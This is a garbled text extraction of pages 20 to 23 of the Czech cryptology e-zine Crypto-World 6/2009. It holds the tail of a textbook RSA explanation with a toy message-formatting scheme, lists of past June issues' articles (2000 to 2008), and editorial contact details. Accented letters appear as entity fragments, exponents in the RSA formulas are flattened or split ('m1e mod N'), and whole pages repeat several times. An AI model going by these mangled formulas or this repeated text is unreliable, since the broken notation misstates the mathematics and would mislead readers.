a lehkyacute uacutevod do časoveacute synchronizace (P Vondruška) 5-9 C Univerzaacutelniacute posilovače hašovaciacutech funkciacute včetně MD5 a SHA1

aneb zaacutechranneacute kolo pro zoufalce (V Kliacutema) 10-14 D NIST (National Institute of Standards and Technology - USA) a kryptografie Recommendation on Key Management ndash čaacutest 2

(J Pinkava) 15-18 E O čem jsme psali v červnu 1999-2005 19-20 F Zaacutevěrečneacute informace 21

Crypto-World 62007 A Přehled a historie polyalfabetickyacutech šifer (PVondruška) 2-11 B Matematizace komplexniacute bezpečnosti v ČR čaacutest I (JHrubyacute) 12-20 C Mikulaacutešskaacute kryptobesiacutedka Call for Papers 21 D O čem jsme psali v červnu 2000-2006 22-23 E Zaacutevěrečneacute informace 24 Přiacuteloha Mikulaacutešskaacute kryptobesiacutedka (6-7122007)- MKB2007_CallForPapers_cervenpdf

Crypto-World 62008 A RFID Co to vlastně maacuteme v kapse (MHlavaacuteč TRosa) 2 - 17 B Bezpečnost PHP aplikaciacute (JVraacutena) 18 - 22 C Popis šifrovaciacuteho algoritmu Serpent (JJeřaacutebek) 24 - 29 D O čem jsme psali v červnu 2000-2007 30 ndash 31 E Zaacutevěrečneacute informace 32

Crypto-World 62009

23

F Zaacutevěrečneacute informace 1 Sešit Crypto-World je oficiaacutelniacute informačniacute sešit Kryptologickeacute sekce Jednoty českyacutech matematiků a fyziků (GCUCMP) Obsahuje člaacutenky podepsaneacute autory Přiacutepadneacute chyby a nepřesnosti jsou diacutelem PVondrušky a autorů jednotlivyacutech podepsanyacutech člaacutenků GCUCMP za ně nemaacute odbornou ani jinou zodpovědnost Adresa URL na niacutež můžete najiacutet tento sešit (zpravidla 3 tyacutedny po jeho rozeslaacuteniacute) a předchoziacute sešity GCUCMP denně aktualizovaneacute novinky z kryptologie a informačniacute bezpečnosti normy standardy straacutenky některyacutech členů a dalšiacute souvisejiacuteciacute materiaacutely httpcrypto-worldinfo 2 Registrace zrušeniacute registrace Zaacutejemci o e-zin se mohou zaregistrovat pomociacute e-mailu na adrese pavelvondruskacrypto-worldinfo (předmět Crypto-World) nebo použiacutet k odeslaacuteniacute žaacutedosti o registraci elektronickyacute formulaacuteř na httpcrypto-worldinfo Při registraci vyžadujeme pouze jmeacuteno a přiacutejmeniacute titul pracoviště (neniacute podmiacutenkou) a e-mail adresu určenou k zasiacutelaacuteniacute koacutedů ke staženiacute sešitu Ke zrušeniacute registrace stačiacute zaslat kraacutetkou zpraacutevu na e-mail pavelvondruskacrypto-worldinfo (předmět rušiacutem odběr Crypto-Worldu) nebo opět použiacutet formulaacuteř na httpcrypto-worldinfo Ve zpraacutevě prosiacutem uveďte jmeacuteno a přiacutejmeniacute a e-mail adresu na kterou byly koacutedy zasiacutelaacuteny 3 Redakce

E-zin Crypto-World Redakčniacute praacutece Pavel Vondruška Staacuteliacute přispěvateleacute Pavel Vondruška Jaroslav Pinkava Jazykovaacute uacuteprava Jakub Vraacutena Přehled autorů httpcrypto-worldinfoobsahautoripdf NEWS Vlastimil Kliacutema (vyacuteběr přiacutespěvků Jaroslav Pinkava komentaacuteře a Tomaacuteš Rosa vklaacutedaacuteniacute na web) Pavel Vondruška Webmaster Pavel Vondruška jr 4 Spojeniacute (abecedně) redakce e-zinu ezincrypto-worldinfo httpcrypto-worldinfo Vlastimil Kliacutema vklimavolnycz httpcryptographyhyperlinkcz Jaroslav Pinkava JaroslavPinkavazonercz httpcrypto-worldinfopinkava Tomaacuteš Rosa t_rosavolnycz httpcryptohyperlinkcz Pavel Vondruška pavelvondruskacrypto-worldinfo httpcrypto-worldinfovondruskaindexphp Pavel Vondruškajr pavelcrypto-worldinfo httpwebdesigncrypto-worldinfo Jakub Vraacutena jakubvranacz httpwwwvranacz

Page 20: Sešit 6/2009 (452 kB)

Crypto-World 62009

20

1 lt e lt Φ(N) takoveacute že e a Φ(N) jsou nesoudělnaacute

Vypočteme čiacuteslo d takoveacute že

1 lt d lt Φ(N) a

ed equiv 1 mod Φ(N)

Dvojici (Nd) nazveme soukromyacute kliacuteč a (Ne) veřejnyacute kliacuteč

3 Formaacutetovaacuteniacute zpraacutevy (CW10)

Zpraacutevu M překoacutedujeme nejprve do čiacuteselneacuteho tvaru K tomu použijeme některou vhodnou převodovou tabulku Např tuto tabulku

0 1 2 3 4 5 6 7 8 9 6 0 Mezera 2 3 4 A B C D E 7 F G H I J K L M N O 8 P Q R S T U V W X Y 9 Z 1 2 3 4 5 6 7 8 9 Zpraacutevu M pak zformaacutetujeme do posloupnosti čiacutesel pevneacute deacutelky (deacutelka bude rovna deacutelce modulu N) K tomu použijeme vlastniacute formaacutetovaacuteniacute kteraacute pracovně nazveme CW10 Formaacutetovaacuteniacute CW10 1) Maacute-li modul deacutelku k budeme zpraacutevu převedenou podle tabulky dělit na skupiny deacutelky k-1 2) Všechny skupiny musiacute miacutet deacutelku k-1 nemaacute-li proto posledniacute skupina tuto deacutelku doplniacuteme

ji zprava přiacuteslušnyacutem počtem nul 3) Všechny ziacuteskaneacute skupiny nyniacute doplniacuteme zleva jednou nulou Deacutelka každeacute skupiny je po

těchto uacutepravaacutech rovna k 4) Vyacutesledek po šifrovaacuteniacute maacute deacutelku rovnou maximaacutelně k nemaacute-li ji doplniacuteme vyacutesledek zleva

nulami Ziacuteskanyacute vyacutesledek po formaacutetovaacuteniacute M označme M= m1 m2 m3 hellip 4 Zašifrovaacuteniacute zpraacutevy M

Zašifrovaacuteniacutem zpraacutevy M pomociacute veřejneacuteho kliacuteče (Ne) rozumiacuteme řetězec

P = C1 C2 C3 kde

C1 equiv m1e mod N C2 equiv m2

e mod N C3 equiv m3e mod N Ci equiv mi

e mod N

5 Dešifrovaacuteniacute zpraacutevy P

Dešifrovaacuteniacute zpraacutevy P se pak provede tak že použijeme soukromyacute exponent d a tiacutem ziacuteskaacuteme původniacute zpraacutevu M

m1 equiv C1d mod N m2 equiv C2

d mod N m3 equiv C3d mod N mi equiv Cid mod N

6 Bezpečnost Pokud dokaacuteže přiacutejemce udržet svůj soukromyacute kliacuteč v tajnosti (a čiacutesla p a q byla dostatečně velkaacute) pak je ze znalosti šifroveacute zpraacutevy a veřejneacuteho kliacuteče vyacutepočetně složiteacute ziacuteskat otevřenou zpraacutevu

Crypto-World 62009

21

E O čem jsme psali v červnu 2000 ndash 2008 Crypto-World 62000 A Novaacute evropskaacute iniciativa v oblasti kryptografie (JPinkava) 2 B Fermatův test primality Carmichaelova čiacutesla bezčtvercovaacute čiacutesla (PVondruška)3 -5 C Červ LOVE-LETTER-FOR-YOUTXTVBS (PVondruška) 6-8 D EUROCRYPT 2000 (PVondruška) 9-11 E Code Talkers (IIIdiacutel) (PVondruška) 12-14 F Letem šifrovyacutem světem 15 G Zaacutevěrečneacute informace 16 Přiacuteloha Navajo Code Talkers revize z 1561945 soubor Dictionaryhtm

Crypto-World 62001 A Zaacutehadnaacute paacuteska z Prahy IIdiacutel (PVondruška JJanečko) 2- 6 B Radioaktivniacute rozpad a kryptografickeacute kliacuteče (LSmoliacutek) 7-9 C Kryptografie a normy diacutel 8 - Normy IETF - SMIME (J Pinkava) 10-13 D Počiacutetačovyacute kurs Lidovyacutech novin (PVondruška) 14-15 E Security and Protection of Information (D Cvrček) 16 F Praacutevniacute odpovědnost poskytovatelů (JMatejka) 17-23 G Ukončeniacute platnosti zneplatněniacute (a zrušeniacute) certifikaacutetu IIdiacutel (JProkeš) 24-25 H Letem šifrovyacutem světem 26-27 I Zaacutevěrečneacute informace 28 Přiacuteloha priloha6zip (fotografie Security 2001 teacutemata přednaacutešek na konferenci Eurocryptacute2001)

Crypto-World 62002 A Historie a statistika Crypto-Worldu (PVondruška) 2-4 B Digitaacutelniacute certifikaacutety IETF-PKIX čaacutest 4 (JPinkava) 5-8 C Bezpečnost informačniacuteho systeacutemu pro certifikačniacute služby (ISCS)

a objektovaacute bezpečnost (PVondruška) 9-16 D Informace - Cryptology ePrint Archive (VKliacutema) 17 E Letem šifrovyacutem světem 18-19

1 Kritika člaacutenku Je 1024-bitovaacute deacutelka kliacuteče RSA dostatečnaacute (Crypto-World 52002)

2 Zaacutekon o elektronickeacutem podpisu novelizovaacuten - Zaacutekon č 2262002 Sb 3 Hackeři pomozte 4 O čem jsme psali v červnu 2000 a 2001

F Zaacutevěrečneacute informace 20

Crypto-World 62003 A Nebezpečiacute internetovyacutech řešeniacute (MKuchař) 2-6 B Digitaacutelniacute certifikaacutety IETF-PKIX čaacutest 13

Atributoveacute certifikaacutety ndash diacutel 2 (JPinkava) 7-10 C Kryptografickeacute protokoly s nulovyacutem předaacuteniacutem znalostiacute(JPinkava) 11-12 D Elektronickeacute peniacuteze (PVondruška) 13-20 E Letem šifrovyacutem světem 21-23 F Zaacutevěrečneacute informace 24

Crypto-World 62009

22

Crypto-World 62004 A Měsiacutec prvočiacutesel (PVondruška) 2-5 B Statistickyacute rozbor největšiacuteho prvočiacutesla (PTesař) 6-7 C Program STORK - vstupniacute dokumenty přiacuteprava (E-CRYPT) čaacutest 2 (JPinkava) 8-16 D Letem šifrovyacutem světem 17-18 E Zaacutevěrečneacute informace 19

Crypto-World 62005 A Informace pro čtenaacuteře a autory (PVondruška) 2-3 B Kontrola certifikačniacute cesty čaacutest 1 (P Rybaacuter) 4-11 C O neziacuteskateľnosti rodneacuteho čiacutesla z jeho hashu (M Pivoluska) 12-13 D Přehledovaacute zpraacuteva o vyacuteznamnyacutech publikaciacutech a projektech na teacutema

poskytovaacuteniacute anonymity klasifikace a měřitelnost informačniacuteho soukromiacute (privacy) čaacutest 2 (M Kumpošt) 14-17

E Kryptografickeacute eskalačniacute protokoly čaacutest 1 (J Krhovjaacutek) 18-21 F Recenze knihy Jon Erickson Hacking - uměniacute exploitace 22 G O čem jsme psali v červnu 2000-2004 23 H Zaacutevěrečneacute informace 24

Crypto-World 62006 A PKI roaming (L Dostaacutelek) 2-4 B Vyhlaacuteška o podrobnostech atestačniacuteho řiacutezeniacute pro elektronickeacute naacutestroje

a lehkyacute uacutevod do časoveacute synchronizace (P Vondruška) 5-9 C Univerzaacutelniacute posilovače hašovaciacutech funkciacute včetně MD5 a SHA1

aneb zaacutechranneacute kolo pro zoufalce (V Kliacutema) 10-14 D NIST (National Institute of Standards and Technology - USA) a kryptografie Recommendation on Key Management ndash čaacutest 2

(J Pinkava) 15-18 E O čem jsme psali v červnu 1999-2005 19-20 F Zaacutevěrečneacute informace 21

Crypto-World 62007 A Přehled a historie polyalfabetickyacutech šifer (PVondruška) 2-11 B Matematizace komplexniacute bezpečnosti v ČR čaacutest I (JHrubyacute) 12-20 C Mikulaacutešskaacute kryptobesiacutedka Call for Papers 21 D O čem jsme psali v červnu 2000-2006 22-23 E Zaacutevěrečneacute informace 24 Přiacuteloha Mikulaacutešskaacute kryptobesiacutedka (6-7122007)- MKB2007_CallForPapers_cervenpdf

Crypto-World 62008 A RFID Co to vlastně maacuteme v kapse (MHlavaacuteč TRosa) 2 - 17 B Bezpečnost PHP aplikaciacute (JVraacutena) 18 - 22 C Popis šifrovaciacuteho algoritmu Serpent (JJeřaacutebek) 24 - 29 D O čem jsme psali v červnu 2000-2007 30 ndash 31 E Zaacutevěrečneacute informace 32

Crypto-World 62009

23

F Zaacutevěrečneacute informace 1 Sešit Crypto-World je oficiaacutelniacute informačniacute sešit Kryptologickeacute sekce Jednoty českyacutech matematiků a fyziků (GCUCMP) Obsahuje člaacutenky podepsaneacute autory Přiacutepadneacute chyby a nepřesnosti jsou diacutelem PVondrušky a autorů jednotlivyacutech podepsanyacutech člaacutenků GCUCMP za ně nemaacute odbornou ani jinou zodpovědnost Adresa URL na niacutež můžete najiacutet tento sešit (zpravidla 3 tyacutedny po jeho rozeslaacuteniacute) a předchoziacute sešity GCUCMP denně aktualizovaneacute novinky z kryptologie a informačniacute bezpečnosti normy standardy straacutenky některyacutech členů a dalšiacute souvisejiacuteciacute materiaacutely httpcrypto-worldinfo 2 Registrace zrušeniacute registrace Zaacutejemci o e-zin se mohou zaregistrovat pomociacute e-mailu na adrese pavelvondruskacrypto-worldinfo (předmět Crypto-World) nebo použiacutet k odeslaacuteniacute žaacutedosti o registraci elektronickyacute formulaacuteř na httpcrypto-worldinfo Při registraci vyžadujeme pouze jmeacuteno a přiacutejmeniacute titul pracoviště (neniacute podmiacutenkou) a e-mail adresu určenou k zasiacutelaacuteniacute koacutedů ke staženiacute sešitu Ke zrušeniacute registrace stačiacute zaslat kraacutetkou zpraacutevu na e-mail pavelvondruskacrypto-worldinfo (předmět rušiacutem odběr Crypto-Worldu) nebo opět použiacutet formulaacuteř na httpcrypto-worldinfo Ve zpraacutevě prosiacutem uveďte jmeacuteno a přiacutejmeniacute a e-mail adresu na kterou byly koacutedy zasiacutelaacuteny 3 Redakce

E-zin Crypto-World Redakčniacute praacutece Pavel Vondruška Staacuteliacute přispěvateleacute Pavel Vondruška Jaroslav Pinkava Jazykovaacute uacuteprava Jakub Vraacutena Přehled autorů httpcrypto-worldinfoobsahautoripdf NEWS Vlastimil Kliacutema (vyacuteběr přiacutespěvků Jaroslav Pinkava komentaacuteře a Tomaacuteš Rosa vklaacutedaacuteniacute na web) Pavel Vondruška Webmaster Pavel Vondruška jr 4 Spojeniacute (abecedně) redakce e-zinu ezincrypto-worldinfo httpcrypto-worldinfo Vlastimil Kliacutema vklimavolnycz httpcryptographyhyperlinkcz Jaroslav Pinkava JaroslavPinkavazonercz httpcrypto-worldinfopinkava Tomaacuteš Rosa t_rosavolnycz httpcryptohyperlinkcz Pavel Vondruška pavelvondruskacrypto-worldinfo httpcrypto-worldinfovondruskaindexphp Pavel Vondruškajr pavelcrypto-worldinfo httpwebdesigncrypto-worldinfo Jakub Vraacutena jakubvranacz httpwwwvranacz

Page 21: Sešit 6/2009 (452 kB)

Crypto-World 62009

21

E O čem jsme psali v červnu 2000 ndash 2008 Crypto-World 62000 A Novaacute evropskaacute iniciativa v oblasti kryptografie (JPinkava) 2 B Fermatův test primality Carmichaelova čiacutesla bezčtvercovaacute čiacutesla (PVondruška)3 -5 C Červ LOVE-LETTER-FOR-YOUTXTVBS (PVondruška) 6-8 D EUROCRYPT 2000 (PVondruška) 9-11 E Code Talkers (IIIdiacutel) (PVondruška) 12-14 F Letem šifrovyacutem světem 15 G Zaacutevěrečneacute informace 16 Přiacuteloha Navajo Code Talkers revize z 1561945 soubor Dictionaryhtm

Crypto-World 62001 A Zaacutehadnaacute paacuteska z Prahy IIdiacutel (PVondruška JJanečko) 2- 6 B Radioaktivniacute rozpad a kryptografickeacute kliacuteče (LSmoliacutek) 7-9 C Kryptografie a normy diacutel 8 - Normy IETF - SMIME (J Pinkava) 10-13 D Počiacutetačovyacute kurs Lidovyacutech novin (PVondruška) 14-15 E Security and Protection of Information (D Cvrček) 16 F Praacutevniacute odpovědnost poskytovatelů (JMatejka) 17-23 G Ukončeniacute platnosti zneplatněniacute (a zrušeniacute) certifikaacutetu IIdiacutel (JProkeš) 24-25 H Letem šifrovyacutem světem 26-27 I Zaacutevěrečneacute informace 28 Přiacuteloha priloha6zip (fotografie Security 2001 teacutemata přednaacutešek na konferenci Eurocryptacute2001)

Crypto-World 62002 A Historie a statistika Crypto-Worldu (PVondruška) 2-4 B Digitaacutelniacute certifikaacutety IETF-PKIX čaacutest 4 (JPinkava) 5-8 C Bezpečnost informačniacuteho systeacutemu pro certifikačniacute služby (ISCS)

a objektovaacute bezpečnost (PVondruška) 9-16 D Informace - Cryptology ePrint Archive (VKliacutema) 17 E Letem šifrovyacutem světem 18-19

1 Kritika člaacutenku Je 1024-bitovaacute deacutelka kliacuteče RSA dostatečnaacute (Crypto-World 52002)

2 Zaacutekon o elektronickeacutem podpisu novelizovaacuten - Zaacutekon č 2262002 Sb 3 Hackeři pomozte 4 O čem jsme psali v červnu 2000 a 2001

F Zaacutevěrečneacute informace 20

Crypto-World 62003 A Nebezpečiacute internetovyacutech řešeniacute (MKuchař) 2-6 B Digitaacutelniacute certifikaacutety IETF-PKIX čaacutest 13

Atributoveacute certifikaacutety ndash diacutel 2 (JPinkava) 7-10 C Kryptografickeacute protokoly s nulovyacutem předaacuteniacutem znalostiacute(JPinkava) 11-12 D Elektronickeacute peniacuteze (PVondruška) 13-20 E Letem šifrovyacutem světem 21-23 F Zaacutevěrečneacute informace 24

Crypto-World 62009

22

Crypto-World 62004 A Měsiacutec prvočiacutesel (PVondruška) 2-5 B Statistickyacute rozbor největšiacuteho prvočiacutesla (PTesař) 6-7 C Program STORK - vstupniacute dokumenty přiacuteprava (E-CRYPT) čaacutest 2 (JPinkava) 8-16 D Letem šifrovyacutem světem 17-18 E Zaacutevěrečneacute informace 19

Crypto-World 62005 A Informace pro čtenaacuteře a autory (PVondruška) 2-3 B Kontrola certifikačniacute cesty čaacutest 1 (P Rybaacuter) 4-11 C O neziacuteskateľnosti rodneacuteho čiacutesla z jeho hashu (M Pivoluska) 12-13 D Přehledovaacute zpraacuteva o vyacuteznamnyacutech publikaciacutech a projektech na teacutema

poskytovaacuteniacute anonymity klasifikace a měřitelnost informačniacuteho soukromiacute (privacy) čaacutest 2 (M Kumpošt) 14-17

E Kryptografickeacute eskalačniacute protokoly čaacutest 1 (J Krhovjaacutek) 18-21 F Recenze knihy Jon Erickson Hacking - uměniacute exploitace 22 G O čem jsme psali v červnu 2000-2004 23 H Zaacutevěrečneacute informace 24

Crypto-World 62006 A PKI roaming (L Dostaacutelek) 2-4 B Vyhlaacuteška o podrobnostech atestačniacuteho řiacutezeniacute pro elektronickeacute naacutestroje

a lehkyacute uacutevod do časoveacute synchronizace (P Vondruška) 5-9 C Univerzaacutelniacute posilovače hašovaciacutech funkciacute včetně MD5 a SHA1

aneb zaacutechranneacute kolo pro zoufalce (V Kliacutema) 10-14 D NIST (National Institute of Standards and Technology - USA) a kryptografie Recommendation on Key Management ndash čaacutest 2

(J Pinkava) 15-18 E O čem jsme psali v červnu 1999-2005 19-20 F Zaacutevěrečneacute informace 21

Crypto-World 62007 A Přehled a historie polyalfabetickyacutech šifer (PVondruška) 2-11 B Matematizace komplexniacute bezpečnosti v ČR čaacutest I (JHrubyacute) 12-20 C Mikulaacutešskaacute kryptobesiacutedka Call for Papers 21 D O čem jsme psali v červnu 2000-2006 22-23 E Zaacutevěrečneacute informace 24 Přiacuteloha Mikulaacutešskaacute kryptobesiacutedka (6-7122007)- MKB2007_CallForPapers_cervenpdf

Crypto-World 62008 A RFID Co to vlastně maacuteme v kapse (MHlavaacuteč TRosa) 2 - 17 B Bezpečnost PHP aplikaciacute (JVraacutena) 18 - 22 C Popis šifrovaciacuteho algoritmu Serpent (JJeřaacutebek) 24 - 29 D O čem jsme psali v červnu 2000-2007 30 ndash 31 E Zaacutevěrečneacute informace 32

Crypto-World 62009

23

F Zaacutevěrečneacute informace 1 Sešit Crypto-World je oficiaacutelniacute informačniacute sešit Kryptologickeacute sekce Jednoty českyacutech matematiků a fyziků (GCUCMP) Obsahuje člaacutenky podepsaneacute autory Přiacutepadneacute chyby a nepřesnosti jsou diacutelem PVondrušky a autorů jednotlivyacutech podepsanyacutech člaacutenků GCUCMP za ně nemaacute odbornou ani jinou zodpovědnost Adresa URL na niacutež můžete najiacutet tento sešit (zpravidla 3 tyacutedny po jeho rozeslaacuteniacute) a předchoziacute sešity GCUCMP denně aktualizovaneacute novinky z kryptologie a informačniacute bezpečnosti normy standardy straacutenky některyacutech členů a dalšiacute souvisejiacuteciacute materiaacutely httpcrypto-worldinfo 2 Registrace zrušeniacute registrace Zaacutejemci o e-zin se mohou zaregistrovat pomociacute e-mailu na adrese pavelvondruskacrypto-worldinfo (předmět Crypto-World) nebo použiacutet k odeslaacuteniacute žaacutedosti o registraci elektronickyacute formulaacuteř na httpcrypto-worldinfo Při registraci vyžadujeme pouze jmeacuteno a přiacutejmeniacute titul pracoviště (neniacute podmiacutenkou) a e-mail adresu určenou k zasiacutelaacuteniacute koacutedů ke staženiacute sešitu Ke zrušeniacute registrace stačiacute zaslat kraacutetkou zpraacutevu na e-mail pavelvondruskacrypto-worldinfo (předmět rušiacutem odběr Crypto-Worldu) nebo opět použiacutet formulaacuteř na httpcrypto-worldinfo Ve zpraacutevě prosiacutem uveďte jmeacuteno a přiacutejmeniacute a e-mail adresu na kterou byly koacutedy zasiacutelaacuteny 3 Redakce

E-zin Crypto-World Redakčniacute praacutece Pavel Vondruška Staacuteliacute přispěvateleacute Pavel Vondruška Jaroslav Pinkava Jazykovaacute uacuteprava Jakub Vraacutena Přehled autorů httpcrypto-worldinfoobsahautoripdf NEWS Vlastimil Kliacutema (vyacuteběr přiacutespěvků Jaroslav Pinkava komentaacuteře a Tomaacuteš Rosa vklaacutedaacuteniacute na web) Pavel Vondruška Webmaster Pavel Vondruška jr 4 Spojeniacute (abecedně) redakce e-zinu ezincrypto-worldinfo httpcrypto-worldinfo Vlastimil Kliacutema vklimavolnycz httpcryptographyhyperlinkcz Jaroslav Pinkava JaroslavPinkavazonercz httpcrypto-worldinfopinkava Tomaacuteš Rosa t_rosavolnycz httpcryptohyperlinkcz Pavel Vondruška pavelvondruskacrypto-worldinfo httpcrypto-worldinfovondruskaindexphp Pavel Vondruškajr pavelcrypto-worldinfo httpwebdesigncrypto-worldinfo Jakub Vraacutena jakubvranacz httpwwwvranacz

Page 22: Sešit 6/2009 (452 kB)

Crypto-World 62009

22

Crypto-World 62004 A Měsiacutec prvočiacutesel (PVondruška) 2-5 B Statistickyacute rozbor největšiacuteho prvočiacutesla (PTesař) 6-7 C Program STORK - vstupniacute dokumenty přiacuteprava (E-CRYPT) čaacutest 2 (JPinkava) 8-16 D Letem šifrovyacutem světem 17-18 E Zaacutevěrečneacute informace 19

Crypto-World 62005 A Informace pro čtenaacuteře a autory (PVondruška) 2-3 B Kontrola certifikačniacute cesty čaacutest 1 (P Rybaacuter) 4-11 C O neziacuteskateľnosti rodneacuteho čiacutesla z jeho hashu (M Pivoluska) 12-13 D Přehledovaacute zpraacuteva o vyacuteznamnyacutech publikaciacutech a projektech na teacutema

poskytovaacuteniacute anonymity klasifikace a měřitelnost informačniacuteho soukromiacute (privacy) čaacutest 2 (M Kumpošt) 14-17

E Kryptografickeacute eskalačniacute protokoly čaacutest 1 (J Krhovjaacutek) 18-21 F Recenze knihy Jon Erickson Hacking - uměniacute exploitace 22 G O čem jsme psali v červnu 2000-2004 23 H Zaacutevěrečneacute informace 24

Crypto-World 62006 A PKI roaming (L Dostaacutelek) 2-4 B Vyhlaacuteška o podrobnostech atestačniacuteho řiacutezeniacute pro elektronickeacute naacutestroje

a lehkyacute uacutevod do časoveacute synchronizace (P Vondruška) 5-9 C Univerzaacutelniacute posilovače hašovaciacutech funkciacute včetně MD5 a SHA1

aneb zaacutechranneacute kolo pro zoufalce (V Kliacutema) 10-14 D NIST (National Institute of Standards and Technology - USA) a kryptografie Recommendation on Key Management ndash čaacutest 2

(J Pinkava) 15-18 E O čem jsme psali v červnu 1999-2005 19-20 F Zaacutevěrečneacute informace 21

Crypto-World 62007 A Přehled a historie polyalfabetickyacutech šifer (PVondruška) 2-11 B Matematizace komplexniacute bezpečnosti v ČR čaacutest I (JHrubyacute) 12-20 C Mikulaacutešskaacute kryptobesiacutedka Call for Papers 21 D O čem jsme psali v červnu 2000-2006 22-23 E Zaacutevěrečneacute informace 24 Přiacuteloha Mikulaacutešskaacute kryptobesiacutedka (6-7122007)- MKB2007_CallForPapers_cervenpdf

Crypto-World 62008 A RFID Co to vlastně maacuteme v kapse (MHlavaacuteč TRosa) 2 - 17 B Bezpečnost PHP aplikaciacute (JVraacutena) 18 - 22 C Popis šifrovaciacuteho algoritmu Serpent (JJeřaacutebek) 24 - 29 D O čem jsme psali v červnu 2000-2007 30 ndash 31 E Zaacutevěrečneacute informace 32

Crypto-World 62009

23

F Zaacutevěrečneacute informace 1 Sešit Crypto-World je oficiaacutelniacute informačniacute sešit Kryptologickeacute sekce Jednoty českyacutech matematiků a fyziků (GCUCMP) Obsahuje člaacutenky podepsaneacute autory Přiacutepadneacute chyby a nepřesnosti jsou diacutelem PVondrušky a autorů jednotlivyacutech podepsanyacutech člaacutenků GCUCMP za ně nemaacute odbornou ani jinou zodpovědnost Adresa URL na niacutež můžete najiacutet tento sešit (zpravidla 3 tyacutedny po jeho rozeslaacuteniacute) a předchoziacute sešity GCUCMP denně aktualizovaneacute novinky z kryptologie a informačniacute bezpečnosti normy standardy straacutenky některyacutech členů a dalšiacute souvisejiacuteciacute materiaacutely httpcrypto-worldinfo 2 Registrace zrušeniacute registrace Zaacutejemci o e-zin se mohou zaregistrovat pomociacute e-mailu na adrese pavelvondruskacrypto-worldinfo (předmět Crypto-World) nebo použiacutet k odeslaacuteniacute žaacutedosti o registraci elektronickyacute formulaacuteř na httpcrypto-worldinfo Při registraci vyžadujeme pouze jmeacuteno a přiacutejmeniacute titul pracoviště (neniacute podmiacutenkou) a e-mail adresu určenou k zasiacutelaacuteniacute koacutedů ke staženiacute sešitu Ke zrušeniacute registrace stačiacute zaslat kraacutetkou zpraacutevu na e-mail pavelvondruskacrypto-worldinfo (předmět rušiacutem odběr Crypto-Worldu) nebo opět použiacutet formulaacuteř na httpcrypto-worldinfo Ve zpraacutevě prosiacutem uveďte jmeacuteno a přiacutejmeniacute a e-mail adresu na kterou byly koacutedy zasiacutelaacuteny 3 Redakce

E-zin Crypto-World Redakčniacute praacutece Pavel Vondruška Staacuteliacute přispěvateleacute Pavel Vondruška Jaroslav Pinkava Jazykovaacute uacuteprava Jakub Vraacutena Přehled autorů httpcrypto-worldinfoobsahautoripdf NEWS Vlastimil Kliacutema (vyacuteběr přiacutespěvků Jaroslav Pinkava komentaacuteře a Tomaacuteš Rosa vklaacutedaacuteniacute na web) Pavel Vondruška Webmaster Pavel Vondruška jr 4 Spojeniacute (abecedně) redakce e-zinu ezincrypto-worldinfo httpcrypto-worldinfo Vlastimil Kliacutema vklimavolnycz httpcryptographyhyperlinkcz Jaroslav Pinkava JaroslavPinkavazonercz httpcrypto-worldinfopinkava Tomaacuteš Rosa t_rosavolnycz httpcryptohyperlinkcz Pavel Vondruška pavelvondruskacrypto-worldinfo httpcrypto-worldinfovondruskaindexphp Pavel Vondruškajr pavelcrypto-worldinfo httpwebdesigncrypto-worldinfo Jakub Vraacutena jakubvranacz httpwwwvranacz

Page 23: Sešit 6/2009 (452 kB)

Crypto-World 62009

23

F Zaacutevěrečneacute informace 1 Sešit Crypto-World je oficiaacutelniacute informačniacute sešit Kryptologickeacute sekce Jednoty českyacutech matematiků a fyziků (GCUCMP) Obsahuje člaacutenky podepsaneacute autory Přiacutepadneacute chyby a nepřesnosti jsou diacutelem PVondrušky a autorů jednotlivyacutech podepsanyacutech člaacutenků GCUCMP za ně nemaacute odbornou ani jinou zodpovědnost Adresa URL na niacutež můžete najiacutet tento sešit (zpravidla 3 tyacutedny po jeho rozeslaacuteniacute) a předchoziacute sešity GCUCMP denně aktualizovaneacute novinky z kryptologie a informačniacute bezpečnosti normy standardy straacutenky některyacutech členů a dalšiacute souvisejiacuteciacute materiaacutely httpcrypto-worldinfo 2 Registrace zrušeniacute registrace Zaacutejemci o e-zin se mohou zaregistrovat pomociacute e-mailu na adrese pavelvondruskacrypto-worldinfo (předmět Crypto-World) nebo použiacutet k odeslaacuteniacute žaacutedosti o registraci elektronickyacute formulaacuteř na httpcrypto-worldinfo Při registraci vyžadujeme pouze jmeacuteno a přiacutejmeniacute titul pracoviště (neniacute podmiacutenkou) a e-mail adresu určenou k zasiacutelaacuteniacute koacutedů ke staženiacute sešitu Ke zrušeniacute registrace stačiacute zaslat kraacutetkou zpraacutevu na e-mail pavelvondruskacrypto-worldinfo (předmět rušiacutem odběr Crypto-Worldu) nebo opět použiacutet formulaacuteř na httpcrypto-worldinfo Ve zpraacutevě prosiacutem uveďte jmeacuteno a přiacutejmeniacute a e-mail adresu na kterou byly koacutedy zasiacutelaacuteny 3 Redakce

E-zin Crypto-World Redakčniacute praacutece Pavel Vondruška Staacuteliacute přispěvateleacute Pavel Vondruška Jaroslav Pinkava Jazykovaacute uacuteprava Jakub Vraacutena Přehled autorů httpcrypto-worldinfoobsahautoripdf NEWS Vlastimil Kliacutema (vyacuteběr přiacutespěvků Jaroslav Pinkava komentaacuteře a Tomaacuteš Rosa vklaacutedaacuteniacute na web) Pavel Vondruška Webmaster Pavel Vondruška jr 4 Spojeniacute (abecedně) redakce e-zinu ezincrypto-worldinfo httpcrypto-worldinfo Vlastimil Kliacutema vklimavolnycz httpcryptographyhyperlinkcz Jaroslav Pinkava JaroslavPinkavazonercz httpcrypto-worldinfopinkava Tomaacuteš Rosa t_rosavolnycz httpcryptohyperlinkcz Pavel Vondruška pavelvondruskacrypto-worldinfo httpcrypto-worldinfovondruskaindexphp Pavel Vondruškajr pavelcrypto-worldinfo httpwebdesigncrypto-worldinfo Jakub Vraacutena jakubvranacz httpwwwvranacz


Recommended